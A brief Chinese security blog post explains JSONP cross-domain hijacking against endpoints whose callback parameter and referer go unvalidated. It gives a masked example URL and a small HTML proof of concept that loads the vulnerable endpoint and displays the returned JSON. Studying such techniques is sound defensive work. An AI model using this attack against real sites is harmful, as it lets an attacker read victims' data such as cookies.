🌤️ 加载中...
#
Web安全与渗透 2017-01-03

jsonp跨域劫持姿势

By Jove 1 Views 2 MIN READ 0 Comments

利用场景:
对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用.

例如:

http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1

有callback参数未做校验,那么,可以用来做个jsonp跨域劫持Cookie.

Demo:

<html>
<script>
function test(json){
alert(JSON.stringify(json))
}
</script>
<script src="http://xxx.xxxx.xxxx/index?callback=test&xxx=1"></script>
</html>

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

转载请注明出处:https://www.jozxing.cc/index.php/archives/831/

TAGS: 无标签

相关推荐

  • 暂无相关推荐,看看别的吧。

0 评论